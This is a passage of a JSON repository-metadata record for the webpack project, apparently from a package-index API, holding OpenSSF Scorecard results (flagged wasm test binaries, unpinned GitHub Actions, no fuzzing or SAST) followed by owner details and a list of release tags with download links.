test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/we